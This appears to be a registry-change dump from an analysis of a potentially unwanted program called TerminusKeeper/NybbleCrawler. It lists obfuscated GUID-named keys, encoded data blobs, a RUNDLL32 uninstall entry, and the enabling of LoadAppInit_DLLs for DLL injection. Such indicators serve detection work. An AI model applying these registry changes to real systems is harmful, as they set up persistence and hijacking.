[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"340d3099" = "/P////%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"c99a5f5c" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"2e22d94e" = "///%"
[HKLM\SOFTWARE\{12A61307-94CD-4F8E-94BC-918E511FAA81}]
"n" = "1"
[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"7f69fa1f" = "///%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"414bc593" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"060df2cd" = "c/Au/XV/H/Ap/X2/GP/j/Xt/axAv/X6////%"
"f1f24e29" = "Vl/l/C/////%"
[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"7367429f" = "///%"
[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\00000000]
"370856c7" = ""
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows]
"LoadAppInit_DLLs" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 22 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{daaabfc6}]
"QuietUninstallString" = "%System%\RUNDLL32.EXE C:\PROGRA~1\TERMIN~1\TERMIN~1.DLL,_uninstall /un /uq"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"e46c271e" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\00000000]
"a47da861" = "o01O07x0m00K02E0aU1e0700m01 0640ml1e06I0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1e0700m01e0780px0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06t0i01A0780px1 02I0nU1M06m0aU1P06I0ox1S07b0i01e06U0n00T00%%, o01O07x0m00K02E0aU1Y06h0ql1M0640ml1J07b0qx1A06t0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1g06E0nx0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1N07t0oU1N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1Z0640n01Y02I0nl1 07x0aU1P06I0ox1S07b0i01e06U0n00T00%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"3c09c42b" = "///%"
"c6c5dd44" = "V/////%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"e8f9dcc7" = "UlAr/XJ/c//k////"
[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610]
"usr.1" = "PC ACFabcdefABCDWY"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"7367429f" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"Version" = "22022148"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\00000000]
"3efeb33e" = ""
[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"e46c271e" = "///%"
"a2e3b941" = "///%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"2e22d94e" = "///%"
[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610]
"data.0" = "ylN02cKwRmiKakztvqeQ0hbt7/5r8kXDWB6fVV0 1R9ENN03GpfkHf8ccg6pVYI75JoJxLo1KGh0BHsbVNkv7mJ2 ECnxzqE12"
"data.1" = "dqDqm3me uMixabcdeYKgxSiir/DCzlUaJ9i2FEpFRQ/8peP02yw6ELFkW/NhrmAaM nVTGJ7dZOaSfxYRigEi7Ow8MFvlLO61f5ZrQtpiALT6jgebbiyQQyOZ4sMdtchi"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"f1f24e29" = "Vl/l/C/////%"
[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"a0743acc" = "N/////%%"
"a1dcff5b" = "V/////%%"
"8b9e4cbc" = "V/////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"7f69fa1f" = "///%"
[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"27ddcf6f" = "///%"
[HKLM\SOFTWARE\{12A61307-94CD-4F8E-94BC-918E511FAA81}]
"daaabfc6" = "%Program Files%\TerminusKeeper\TerminusKeeper.dll"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"Mode" = "4026531840"
[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"fe94ce1e" = "V/////%%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{daaabfc6}]
"UninstallString" = "%System%\RUNDLL32.EXE C:\PROGRA~1\TERMIN~1\TERMIN~1.DLL,_uninstall /un"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"27ddcf6f" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"usr.0" = "6HJ35AXZTVNPRJLFHw"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"bbf88800" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"uuid" = "8738532578695851691"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{daaabfc6}]
"NoModify" = "1"
[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"48bd1aff" = "V/////%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"d1abcdb6" = "///%"
[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"0c230bcb" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"Install_Dir" = "%Program Files%\TerminusKeeper"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"d94388d2" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"
[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610]
"uuid" = "8738532578695851691"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"bbf88800" = "///%"
[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"c99a5f5c" = "///%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"a1dcff5b" = "V/////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"data.0" = "ylN02cKwRmiKakztvqeQ0hbt7/5r8kXDWB6fVV0 1R9ENN03GpfkHf8ccg6pVYI75JoJxLo1KGh0BHsbVNkv7mJ2 ECnxzqE12"
"data.1" = "dqDqm3me uMixabcdeYKgxSiir/DCzlUaJ9i2FEpFRQ/8peP02yw6ELFkW/NhrmAaM nVTGJ7dZOaSfxYRigEi7Ow8MFvlLO61f5ZrQtpiALT6jgebbiyQQyOZ4sMdtchi"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"51d2f2ea" = "IxA3/XZ/FxAm/XJ/PlAf/XD/clAm/XJ/bx////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"State" = "0"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"1c311243" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"a0743acc" = "N/////%%"
[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"587b5709" = "V/////%%"
[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\00000000]
"3efeb33e" = ""
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "3F D1 B4 B9 E4 DD C5 30 2F 5F E0 A4 BC 1C 07 0A"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\00000000]
"370856c7" = ""
[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"bbf88800" = "///%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"72758a5d" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"8b9e4cbc" = "V/////%%"
[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"f6ad6fa6" = "V/////%%"
"c5705860" = "Vx////%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"a2e3b941" = "///%"
[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"0dc3ee96" = "/P////%%"
[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\00000000]
"493c7345" = "i01 06b0o01D06I0px0S06I0px1O00%%, pl1e06b0i01T0780jx1B06E0nU1h02I0nl1 07x0"
[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"38583bc3" = "Ml/2/CF/M//g/CZ////%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"0e93c3f3" = "///%"
[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610]
"LRTS" = "0"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"3c09c42b" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"7367429f" = "///%"
[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610]
"svt" = "1435726521"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"587b5709" = "V/////%%"
[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"060df2cd" = "c/Au/XV/H/Ap/X2/GP/j/Xt/axAv/X6////%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"a2e3b941" = "///%"
[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"1c311243" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"
[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610]
"svx" = ""
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"48bd1aff" = "V/////%%"
[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610]
"usr.0" = "6HJ35AXZTVNPRJLFHw"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"2d71d5ab" = "V/////%%"
[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610]
"svn" = "TerminusKeeper"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"7f69fa1f" = "///%"
[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610]
"svi" = "0"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"c24899a6" = "VP/g/CV/Vl/2/Cx////%"
[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"65114b36" = "Vl/l////"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"dlpath" = "c:\progra~1\termin~1\termin~1.dll"
[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"e8f9dcc7" = "UlAr/XJ/c//k////"
[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610]
"date" = "1435726441"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"e8f9dcc7" = "UlAr/XJ/c//k////"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"37b7a6d8" = "UlAr/XJ/c//k////"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"65114b36" = "Vl/l////"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"iiid" = "1"
[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"f1f24e29" = "Vl/l/C/////%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"LRTS" = "0"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"f2c53c49" = "UlAr/XJ/c//k////"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"38583bc3" = "Ml/2/CF/M//g/CZ////%"
[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"72758a5d" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"0dc3ee96" = "/P////%%"
[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"f0bf0bde" = "///%"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"38583bc3" = "Ml/2/CF/M//g/CZ////%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"svn" = "TerminusKeeper"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"8b9e4cbc" = "V/////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"c5705860" = "Vx////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"svi" = "0"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"usr.0" = "6HJ35AXZTVNPRJLFHw"
"usr.1" = "PC ACFabcdefABCDWY"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"svt" = "1435726521"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"f6ad6fa6" = "V/////%%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{daaabfc6}]
"Publisher" = "NybbleCrawler"
[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\00000000]
"a47da861" = "o01O07x0m00K02E0aU1e0700m01 0640ml1e06I0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1e0700m01e0780px0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06t0i01A0780px1 02I0nU1M06m0aU1P06I0ox1S07b0i01e06U0n00T00%%, o01O07x0m00K02E0aU1Y06h0ql1M0640ml1J07b0qx1A06t0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1g06E0nx0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1A0640qU1O06E0ml1J06m0nU1T06x0al1T0780pU0T07t0nl1D06I0mU1O0640n01Y02E0, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1W06E0o01S07b0nx1D07x0o01N06Y0jx0S06E0ml1B02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1N07t0oU1N06Y0jx0S06b0nU1Z02E0ix1S06h0nl1N07x0qx1Y06U0aU0%, o01O07x0m00K02E0aU1Z0640j01D06O0ix1Z0640n01Y02I0nl1 07x0aU1P06I0ox1S07b0i01e06U0n00T00%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"svx" = ""
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"e46c271e" = "///%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"1c311243" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"6185d035" = "Vx/2/Cx/V//l////"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"1520c6f1" = "V/////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"f0bf0bde" = "///%"
"fe94ce1e" = "V/////%%"
"72758a5d" = "///%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{daaabfc6}]
"DisplayName" = "NybbleCrawler"
[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"d1abcdb6" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"1520c6f1" = "V/////%%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"date" = "1435726441"
"LRTS" = "0"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"c24899a6" = "VP/g/CV/Vl/2/Cx////%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_b0250ce0\eae10f9d]
"340d3099" = "///%"
[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"37b7a6d8" = "UlAr/XJ/c//k////"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"usr.1" = "PC ACFabcdefABCDWY"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"51d2f2ea" = "IxA3/XZ/FxAm/XJ/PlAf/XD/clAm/XJ/bx////%%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{daaabfc6}]
"Cache" = "9428760297565573948"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"414bc593" = "///%"
[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"c24899a6" = "VP/g/CV/Vl/2/Cx////%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"2e22d94e" = "///%"
"414bc593" = "///%"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{daaabfc6}]
"InstallDate" = "20140701"
[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"51d2f2ea" = "IxA3/XZ/FxAm/XJ/PlAf/XD/clAm/XJ/bx////%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"d94388d2" = "GlAk/X6/G/Ap/YV/UxAk/YZ/Gl////%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"data.1" = "dqDqm3me uMixabcdeYKgxSiir/DCzlUaJ9i2FEpFRQ/8peP02yw6ELFkW/NhrmAaM nVTGJ7dZOaSfxYRigEi7Ow8MFvlLO61f5ZrQtpiALT6jgebbiyQQyOZ4sMdtchi"
"data.0" = "ylN02cKwRmiKakztvqeQ0hbt7/5r8kXDWB6fVV0 1R9ENN03GpfkHf8ccg6pVYI75JoJxLo1KGh0BHsbVNkv7mJ2 ECnxzqE12"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"6185d035" = "Vx/2/Cx/V//l////"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"f0bf0bde" = "///%"
[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610]
"Mode" = "4026531840"
"iiid" = "1"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"65114b36" = "Vl/l////"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6]
"uuid" = "8738532578695851691"
[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"c6c5dd44" = "V/////%%"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}{daaabfc6}]
"NoRepair" = "1"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"340d3099" = "///%"
[HKLM\SOFTWARE\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"a0743acc" = "N/////%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\00000000]
"493c7345" = "i01 06b0o01D06I0px0S06I0px1O00%%, pl1e06b0i01T0780jx1B06E0nU1h02I0nl1 07x0"
[HKLM\SOFTWARE\{3A7D3E19-1B79-4E4E-BD96-5467DA2C4EF0}]
"n" = "1"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"f6ad6fa6" = "V/////%%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\00000000]
"3efeb33e" = ""
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\eae10f9d]
"27ddcf6f" = "///%"
[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610]
"State" = "0"
[HKLM\SOFTWARE\e5f1f541-cda7-09cd-83cb-a28a05c4e59a\65211815278982610\eae10f9d]
"0e93c3f3" = "///%"
[HKCU\Software\AppDataLow\{12DA0E6F-5543-440C-BAA2-28BF01070AFA}\_daaabfc6\00000000]
